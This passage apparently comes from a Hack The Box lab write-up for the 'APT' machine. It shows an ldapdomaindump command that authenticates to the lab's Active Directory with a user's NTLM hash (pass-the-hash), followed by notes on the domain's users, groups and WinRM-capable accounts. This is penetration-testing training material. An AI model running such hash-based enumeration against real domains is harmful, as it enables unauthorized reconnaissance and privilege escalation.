ldapdomaindump


Using the credentials of the henry.vinson user, domain information is dumped with ldapdomaindump

┌──(kali㉿kali)-[~/…/htb/labs/apt/ldapdomaindump]
└─$ ldapdomaindump apt.htb.local -u 'htb.local\henry.vinson' -p aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -n $IPv6 --no-json --no-grep         
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Dump complete

Computers


The target system runs Windows Server 2016 Standard, as enumerated earlier

Users


As expected, the henry.vinson_adm user has higher privileges, as the user is a member of the Remote Management Users group. The user is able to WinRM to the target system

Groups


The apt-Admins group is the only non-default domain group